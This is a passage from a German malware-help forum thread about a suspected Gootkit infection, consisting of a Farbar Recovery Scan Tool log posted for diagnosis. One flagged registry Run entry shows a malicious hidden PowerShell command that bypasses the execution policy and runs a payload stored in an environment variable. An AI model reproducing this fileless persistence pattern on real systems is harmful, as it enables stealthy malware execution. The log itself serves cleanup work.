Trojaner-Board
Seite 2 von 2 1 2
100 Beiträge dieses Themas auf einer Seite anzeigen

Trojaner-Board (https://www.trojaner-board.de/)
-   Plagegeister aller Art und deren Bekämpfung (https://www.trojaner-board.de/plagegeister-aller-art-deren-bekaempfung/)
-   -   Laut Vodafone angeblich mit Gootkit befallen (https://www.trojaner-board.de/200493-laut-vodafone-angeblich-gootkit-befallen.html)

Rupsi 02.12.2020 22:27
Code:
Untersuchungsergebnis von Farbar Recovery Scan Tool (FRST) (x64) Version: 02-12-2020
durchgeführt von Tom (Administrator) auf DESKTOP-HRMFF6U (02-12-2020 22:23:53)
Gestartet von C:\Users\Tom\Desktop
Geladene Profile: Tom
Platform: Windows 10 Pro Version 2004 19041.630 (X64) Sprache: Deutsch (Deutschland)
Standard-Browser: FF
Start-Modus: Normal
Anleitung für Farbar Recovery Scan Tool: hxxp://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Prozesse (Nicht auf der Ausnahmeliste) =================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Prozess geschlossen. Die Datei wird nicht verschoben.)

() [Datei ist nicht signiert] C:\Program Files (x86)\Drakonia Configurator\hid.exe
() [Datei ist nicht signiert] C:\Program Files (x86)\Drakonia Configurator\trayicon.exe
(Adobe Inc. -> Adobe Inc.) C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
(Electronic Arts, Inc. -> ) C:\Program Files (x86)\Origin\igoproxy64.exe
(Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\Origin.exe
(Electronic Arts, Inc. -> Electronic Arts) C:\Program Files (x86)\Origin\OriginWebHelperService.exe
(Geek Software GmbH -> Geek Software GmbH) C:\Program Files (x86)\PDF24\pdf24.exe <2>
(Hauppauge Computer Works Inc. -> Hauppauge Computer Works) [Datei ist nicht signiert] D:\WinTV8\TVServer\CaptureGenPCI.exe
(Hauppauge Computer Works Inc. -> Hauppauge Computer Works) [Datei ist nicht signiert] D:\WinTV8\TVServer\HauppaugeTVServer.exe
(Intel(R) Embedded Subsystems and IP Blocks Group -> Intel Corporation) C:\Windows\System32\DriverStore\FileRepository\dal.inf_amd64_ffc75848a6342fdf\jhi_service.exe
(Intel(R) Trust Services -> Intel(R) Corporation) C:\Windows\System32\DriverStore\FileRepository\iclsclient.inf_amd64_75ffca5eec865b4b\lib\TPMProvisioningService.exe
(LAVASOFT SOFTWARE CANADA INC -> ) C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\mbamtray.exe
(Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMWsc.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Microsoft Corporation -> Microsoft Corporation) C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\userinit.exe
(Microsoft Windows -> Microsoft Corporation) C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2010.7-0\MsMpEng.exe
(Microsoft Windows Publisher -> Microsoft Corporation) C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2010.7-0\NisSrv.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files (x86)\NVIDIA Corporation\NvTelemetry\NvTelemetryContainer.exe
(NVIDIA Corporation -> NVIDIA Corporation) C:\Program Files\NVIDIA Corporation\Display.NvContainer\NVDisplay.Container.exe <2>
(Plex, Inc -> Plex, Inc.) D:\Plex Media Server\Plex Update Service.exe
(Realtek Semiconductor Corp. -> Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH) C:\Program Files (x86)\StarMoney 11\ouservice\StarMoneyOnlineUpdate.exe
(Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH) C:\Program Files (x86)\StarMoney 12 Basic\ouservice\StarMoneyOnlineUpdate.exe
(Synology Inc. -> ) [Datei ist nicht signiert] C:\Program Files (x86)\Synology\Assistant\UsbClientService.exe
(TVG Telefon- und Verzeichnisverlag GmbH & Co. KG -> ) C:\Program Files (x86)\TVG\OnlineUpdate\OnlineUpdateSvc.exe
(Wondershare Technology Co.,Ltd -> Wondershare) C:\Program Files (x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe
(Wondershare Technology Co.,Ltd -> Wondershare) D:\Program Files (x86)\Wondershare\drfone\Library\DriverInstaller\DriverInstall.exe

==================== Registry (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt. Die Datei wird nicht verschoben.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8899592 2016-08-18] (Realtek Semiconductor Corp. -> Realtek Semiconductor)
HKLM-x32\...\Run: [GamingMouse] => C:\Program Files (x86)\Drakonia Configurator\hid.exe [248832 2013-10-29] () [Datei ist nicht signiert]
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe [2133728 2017-09-12] (Wondershare Technology Co.,Ltd -> Wondershare)
HKLM-x32\...\Run: [PDFPrint] => C:\Program Files (x86)\PDF24\pdf24.exe [483976 2020-08-13] (Geek Software GmbH -> Geek Software GmbH)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Beschränkung <==== ACHTUNG
HKU\S-1-5-19\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-20\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [518656 2019-12-07] (Microsoft Windows -> Microsoft Corporation)
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Run: [EADM] => C:\Program Files (x86)\Origin\Origin.exe [3145504 2020-11-23] (Electronic Arts, Inc. -> Electronic Arts)
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Run: [aedffcbccbfe] => powershell.exe -ExecutionPolicy Bypass -windowstyle hidden -Command "IEX([Environment]::GetEnvironmentVariable('aedffcbccbfe', 'User'))" <==== ACHTUNG
HKU\S-1-5-21-3451750051-380284315-2914928687-1002\...\Run: [Lync] => C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe [23923520 2020-11-15] (Microsoft Corporation -> Microsoft Corporation)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{73FA19D0-2D75-11D2-995D-00C04F98BBC9}] ->
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\AutoStart IR.lnk [2017-12-10]
ShortcutTarget: AutoStart IR.lnk -> D:\WinTV8\Ir.exe (Hauppauge Computer Works Inc. -> Hauppauge Computer Works) [Datei ist nicht signiert]
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\WinTV Recording Status.lnk [2017-12-10]
ShortcutTarget: WinTV Recording Status.lnk -> D:\WinTV8\WinTV8\WinTVTray.exe (Hauppauge Computer Works Inc. -> Hauppauge Computer Works, Inc.) [Datei ist nicht signiert]
Startup: C:\Users\Tom\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Mounten.bat [2020-06-10] ()

==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) ============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

Task: {04CA3909-D69D-43A5-99CA-E4A7DB045E6B} - System32\Tasks\NvTmRepCR2_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950128 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {0EFEBAAC-576E-4762-8997-7B0E494946BA} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-04-20] (Google Inc -> Google Inc.)
Task: {1017B9C3-45B8-4597-B14C-533C4DD0962B} - System32\Tasks\NvTmRepCR1_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950128 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {21B90862-E5A8-4513-A6E7-B3318C907E16} - System32\Tasks\Microsoft\Office\Office Automatic Updates 2.0 => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22939528 2020-11-04] (Microsoft Corporation -> Microsoft Corporation)
Task: {301D3EF3-4629-4E7B-A141-56376012B2D2} - System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [855408 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {58C39010-E634-4932-82D7-6908617A530B} - System32\Tasks\klcp_update => D:\Program Files (x86)\K-Lite Codec Pack\Tools\CodecTweakTool.exe [1179648 2019-05-04] () [Datei ist nicht signiert]
Task: {6650BCCE-E32F-4AA3-8646-656E362AD7AD} - System32\Tasks\Opera GX scheduled Autoupdate 1581624516 => C:\Users\Vincent\AppData\Local\Programs\Opera GX\launcher.exe [1654808 2020-11-09] (Opera Software AS -> Opera Software)
Task: {6AEB12E4-EBBE-49F9-BF52-BA918C8FF8D7} - System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files\NVIDIA Corporation\Update Core\NvProfileUpdater64.exe [855408 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {6EC9D36C-56A9-49EF-80C8-E873D54B79E3} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [3982744 2020-11-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {7B618AD2-A374-4448-9922-2761F033DD0E} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files (x86)\Microsoft Office\root\Office16\msoia.exe [3982744 2020-11-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {89D3A3AF-AA6C-4D9C-B5A9-E8BF31EB742D} - System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950128 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {8AE68F17-25F4-4A4B-9F41-2BA2C9A23871} - System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmMon.exe [695664 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {8F1D618A-832E-4B10-8203-742394F9E334} - System32\Tasks\Microsoft\Office\Office Feature Updates => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [117600 2020-11-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {93034433-CC5F-470F-A985-B27BCA73C2CE} - System32\Tasks\GarminUpdaterTask => C:\Program Files (x86)\Garmin\Express SelfUpdater\ExpressSelfUpdater.exe [40432 2020-09-21] (Garmin International, Inc. -> )
Task: {94CBBC10-AAB9-4C2C-A6B3-12E2A6895D7B} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [1349200 2020-11-03] (Adobe Inc. -> Adobe Inc.)
Task: {A34D82CB-2F6B-44C9-807F-C038448DD629} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [153168 2018-04-20] (Google Inc -> Google Inc.)
Task: {A9488763-4F15-4C35-96F7-11315EA3F955} - System32\Tasks\WebDiscover Browser Update Task => C:\Users\Vincent\AppData\Local\WebDiscoverBrowser\4.28.2\browser.exe <==== ACHTUNG
Task: {AB419D69-ABC8-46B7-8635-373A19889BA4} - System32\Tasks\NvTmRepCR3_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8} => C:\Program Files (x86)\NVIDIA Corporation\Update Core\NvTmRep.exe [950128 2018-10-11] (NVIDIA Corporation -> NVIDIA Corporation)
Task: {BF858A89-C229-4458-B2F5-558835BA4A14} - System32\Tasks\Microsoft\Office\Office Feature Updates Logon => C:\Program Files (x86)\Microsoft Office\root\Office16\sdxhelper.exe [117600 2020-11-15] (Microsoft Corporation -> Microsoft Corporation)
Task: {DB6AEEDB-4855-4BEB-9E27-295F36EF6FF0} - System32\Tasks\Mozilla\Firefox Default Browser Agent 308046B0AF4A39CB => C:\Program Files\Mozilla Firefox\default-browser-agent.exe [670928 2020-11-24] (Mozilla Corporation -> Mozilla Foundation)
Task: {DE716A61-2033-4009-AB31-EB3368A9D735} - System32\Tasks\Microsoft\Office\Office ClickToRun Service Monitor => C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeC2RClient.exe [22939528 2020-11-04] (Microsoft Corporation -> Microsoft Corporation)
Task: {E6A8E65B-E786-46B7-8EE4-6BBF1BB5548B} - System32\Tasks\Intel PTT EK Recertification => C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_75ffca5eec865b4b\lib\IntelPTTEKRecertification.exe [918288 2020-04-22] (Intel(R) Trust Services -> Intel(R) Corporation)

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)

Task: C:\WINDOWS\Tasks\Intel PTT EK Recertification.job => C:\WINDOWS\System32\DriverStore\FileRepository\iclsclient.inf_amd64_75ffca5eec865b4b\lib\IntelPTTEKRecertification.exe

==================== Internet (Nicht auf der Ausnahmeliste) ====================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Eintrag entfernt oder auf den Standardwert zurückgesetzt, wenn es sich um einen Registryeintrag handelt.)

Tcpip\Parameters: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{63218f78-6517-4416-a1f6-e54ff6d4ebb1}: [DhcpNameServer] 192.168.42.129
Tcpip\..\Interfaces\{8614a304-0d06-47f8-ae57-178008927bf3}: [DhcpNameServer] 192.168.178.1
Tcpip\..\Interfaces\{e7f632ab-1108-4f8c-ac4e-4975ffc27554}: [DhcpNameServer] 192.168.42.129

Edge:
======
Edge DefaultProfile: Default
Edge Profile: C:\Users\Tom\AppData\Local\Microsoft\Edge\User Data\Default [2020-11-28]
Edge DownloadDir: H:\Download
Edge StartupUrls: Default -> "hxxp://startpage.de/"
Edge DefaultSearchURL: Default -> hxxp://startpage.de
Edge DefaultSearchKeyword: Default -> startpage

FireFox:
========
FF DefaultProfile: 4eks1494.default
FF ProfilePath: C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default [2020-12-02]
FF DownloadDir: H:\Download
FF Homepage: Mozilla\Firefox\Profiles\4eks1494.default -> hxxps://www.startpage.com/do/mypage.pl?prfe=67d6f7efcd45238dc5da976ba89cf2c1761002405484af240c1c89932309a9bc682f42f8e95b43a819e717eb408e8de7
FF Notifications: Mozilla\Firefox\Profiles\4eks1494.default -> hxxps://www.alibaba.com; hxxps://support.gearbest.com
FF HomepageOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Disabled: web@fd9b3d8a-1178-45ab-92a8-a172d0b7c32e
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Disabled: web@fd9b3d8a-1178-45ab-92a8-a172d0b7c32e
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Enabled: {d04b0b40-3dab-4f0b-97a6-04ec3eddbfb0}
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Enabled: {20fc2e06-e3e4-4b2b-812b-ab431220cada}
FF NewTabOverride: Mozilla\Firefox\Profiles\4eks1494.default -> Disabled: {d04b0b40-3dab-4f0b-97a6-04ec3eddbfb0}
FF Extension: (convert2mp3.net Online Video Converter) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\info@convert2mp3.net.xpi [2018-02-19]
FF Extension: (Jetzt Konvertieren) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\web@fd9b3d8a-1178-45ab-92a8-a172d0b7c32e.xpi [2019-07-16] [UpdateUrl:hxxps://d3qg9vtfkj5yig.cloudfront.net/WebExtensions/Updates/update.json]
FF Extension: (Startpage.com — Datenschutz-Suchmaschine) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\{20fc2e06-e3e4-4b2b-812b-ab431220cada}.xpi [2019-10-12]
FF Extension: (Deaktivierungs-Add-on von Google Analytics) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\{6d96bb5e-1175-4ebf-8ab5-5f56f1c79f65}.xpi [2020-04-16] [UpdateUrl:hxxps://tools.google.com/service/update2/ff?guid=%ITEM_ID%&version=%ITEM_VERSION%&application=%APP_ID%&appversion=%APP_VERSION%]
FF Extension: (Video DownloadHelper) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\{b9db16a4-6edc-47ec-a1f4-b86292ed211d}.xpi [2020-03-31]
FF Extension: (Ecosia – Die Suchmaschine, die Bäume pflanzt) - C:\Users\Tom\AppData\Roaming\Mozilla\Firefox\Profiles\4eks1494.default\Extensions\{d04b0b40-3dab-4f0b-97a6-04ec3eddbfb0}.xpi [2019-09-08]
FF HKLM\...\Firefox\Extensions: [{9ea472d6-41d7-49db-bb40-1c8306a23129}] - C:\Program Files (x86)\twengoo\ff\twengoo-1.0.0-fx.xpi
FF Extension: (Twengoo) - C:\Program Files (x86)\twengoo\ff\twengoo-1.0.0-fx.xpi [2019-09-22]
FF HKLM-x32\...\Firefox\Extensions: [{9ea472d6-41d7-49db-bb40-1c8306a23129}] - C:\Program Files (x86)\twengoo\ff\twengoo-1.0.0-fx.xpi
FF Plugin: @java.com/DTPlugin,version=13.0.2.0 -> C:\Program Files\Java\jre-10.0.2\bin\dtplugin\npDeployJava1.dll [2020-06-27] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=13.0.2.0 -> C:\Program Files\Java\jre-10.0.2\bin\plugin2\npjp2.dll [2020-06-27] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office\root\Office16\NPSPWRAP.DLL [Keine Datei]
FF Plugin: @videolan.org/vlc,version=2.2.8 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.10 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.11 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.3 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.8 -> D:\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.cpdf -> d:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Keine Datei]
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xdp -> d:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Keine Datei]
FF Plugin-x32: @foxitsoftware.com/Foxit Reader Plugin,version=1.0,application/vnd.xfdf -> d:\Program Files (x86)\Foxit Software\Foxit Reader\plugins\npFoxitReaderPlugin.dll [Keine Datei]
FF Plugin-x32: @java.com/DTPlugin,version=11.251.2 -> D:\Java\2_51\bin\dtplugin\npDeployJava1.dll [2020-05-01] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.251.2 -> D:\Java\2_51\bin\plugin2\npjp2.dll [2020-05-01] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2020-09-18] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2020-09-18] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nvidia.com/3DVision -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dv.dll [Keine Datei]
FF Plugin-x32: @nvidia.com/3DVisionStreaming -> C:\Program Files (x86)\NVIDIA Corporation\3D Vision\npnv3dvstreaming.dll [Keine Datei]
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2020-11-19] (Adobe Inc. -> Adobe Systems Inc.)

==================== Dienste (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R2 AdobeARMservice; C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe [170056 2020-11-03] (Adobe Inc. -> Adobe Inc.)
S3 BEService; C:\Program Files (x86)\Common Files\BattlEye\BEService.exe [8567960 2020-03-24] (BattlEye Innovations e.K. -> )
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [9057136 2020-11-04] (Microsoft Corporation -> Microsoft Corporation)
S3 EasyAntiCheat; C:\Program Files (x86)\EasyAntiCheat\EasyAntiCheat.exe [784512 2020-03-14] (EasyAntiCheat Oy -> EasyAntiCheat Ltd)
S3 GameforgeClientService; C:\Program Files (x86)\GameforgeClient\gfservice.exe [562848 2020-08-06] (Gameforge 4D GmbH -> )
R2 HauppaugeTVServer; d:\WinTV8\TVServer\HauppaugeTVServer.exe [586536 2017-06-08] (Hauppauge Computer Works Inc. -> Hauppauge Computer Works) [Datei ist nicht signiert]
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7269976 2020-12-02] (Malwarebytes Inc -> Malwarebytes)
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2523448 2020-11-23] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3478336 2020-11-23] (Electronic Arts, Inc. -> Electronic Arts)
R2 PDF24; C:\Program Files (x86)\PDF24\pdf24.exe [483976 2020-08-13] (Geek Software GmbH -> Geek Software GmbH)
R2 PlexUpdateService; D:\Plex Media Server\Plex Update Service.exe [2209256 2018-02-15] (Plex, Inc -> Plex, Inc.)
S3 Sense; C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe [5101992 2020-11-11] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 StarMoney 11 OnlineUpdate; C:\Program Files (x86)\StarMoney 11\ouservice\StarMoneyOnlineUpdate.exe [750296 2019-10-28] (Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH)
R2 StarMoney 12 Basic OnlineUpdate; C:\Program Files (x86)\StarMoney 12 Basic\ouservice\StarMoneyOnlineUpdate.exe [762160 2020-10-22] (Star Finanz - Software Entwicklung und Vertriebs GmbH -> Star Finanz-Software Entwicklung und Vertriebs GmbH)
R2 TVGOnlineUpdateSvc; C:\Program Files (x86)\TVG\OnlineUpdate\OnlineUpdateSvc.exe [398128 2010-12-14] (TVG Telefon- und Verzeichnisverlag GmbH & Co. KG -> )
R2 UsbClientService; c:\Program Files (x86)\Synology\Assistant\UsbClientService.exe [248856 2017-08-08] (Synology Inc. -> ) [Datei ist nicht signiert]
R2 WCAssistantService; C:\Program Files (x86)\Lavasoft\Web Companion\Application\Lavasoft.WCAssistant.WinService.exe [29272 2020-04-10] (LAVASOFT SOFTWARE CANADA INC -> )
R3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\NisSrv.exe [2467088 2020-11-06] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2010.7-0\MsMpEng.exe [128376 2020-11-06] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 WsAppService3; C:\Program Files (x86)\Wondershare\WAF3\3.0.0.308\WsAppService3.exe [83232 2019-06-26] (Wondershare Technology Co.,Ltd -> Wondershare)
R2 WsDrvInst; D:\Program Files (x86)\Wondershare\drfone\Library\DriverInstaller\DriverInstall.exe [130336 2019-06-26] (Wondershare Technology Co.,Ltd -> Wondershare)

===================== Treiber (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2014-09-09] (ASUSTeK Computer Inc. -> )
R3 busenum; C:\WINDOWS\System32\drivers\busenum.sys [57824 2012-08-03] (Synology Inc. -> Windows (R) Win 7 DDK provider)
R1 ESProtectionDriver; C:\WINDOWS\system32\drivers\mbae64.sys [153312 2020-12-02] (Malwarebytes Corporation -> Malwarebytes)
R3 HCW85BDA; C:\WINDOWS\system32\drivers\HCW85BDA.sys [2265832 2017-06-19] (Hauppauge Computer Works Inc. -> Hauppauge Computer Works)
R3 hcw85cir; C:\WINDOWS\system32\drivers\hcw85cir4.sys [79600 2017-06-19] (Hauppauge Computer Works Inc. -> Hauppauge Computer Works, Inc.)
R2 MBAMChameleon; C:\WINDOWS\System32\Drivers\MbamChameleon.sys [220160 2020-12-02] (Malwarebytes Inc -> Malwarebytes)
S0 MbamElam; C:\WINDOWS\System32\DRIVERS\MbamElam.sys [19912 2020-12-02] (Microsoft Windows Early Launch Anti-malware Publisher -> Malwarebytes)
R3 MBAMFarflt; C:\WINDOWS\System32\DRIVERS\farflt.sys [197792 2020-12-02] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMProtection; C:\WINDOWS\system32\DRIVERS\mbam.sys [77496 2020-12-02] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMSwissArmy; C:\WINDOWS\System32\Drivers\mbamswissarmy.sys [248968 2020-12-02] (Malwarebytes Inc -> Malwarebytes)
R3 MBAMWebProtection; C:\WINDOWS\system32\DRIVERS\mwac.sys [138904 2020-12-02] (Malwarebytes Inc -> Malwarebytes)
S3 RzDev_0203; C:\WINDOWS\System32\drivers\RzDev_0203.sys [51688 2018-04-22] (Razer USA Ltd. -> Razer Inc)
S3 RzDev_0306; C:\WINDOWS\System32\drivers\RzDev_0306.sys [51776 2019-09-19] (Razer USA Ltd. -> Razer Inc)
U5 rzudd; C:\Windows\System32\Drivers\rzudd.sys [204824 2016-10-30] (Razer USA Ltd. -> Razer Inc)
R3 SteamStreamingMicrophone; C:\WINDOWS\system32\drivers\SteamStreamingMicrophone.sys [40736 2017-07-28] (Valve Corp. -> )
R3 SteamStreamingSpeakers; C:\WINDOWS\system32\drivers\SteamStreamingSpeakers.sys [40736 2017-07-21] (Valve Corp. -> )
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [48536 2020-11-06] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [429288 2020-11-06] (Microsoft Windows -> Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [71912 2020-11-06] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)


==================== Ein Monat (erstellte) (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

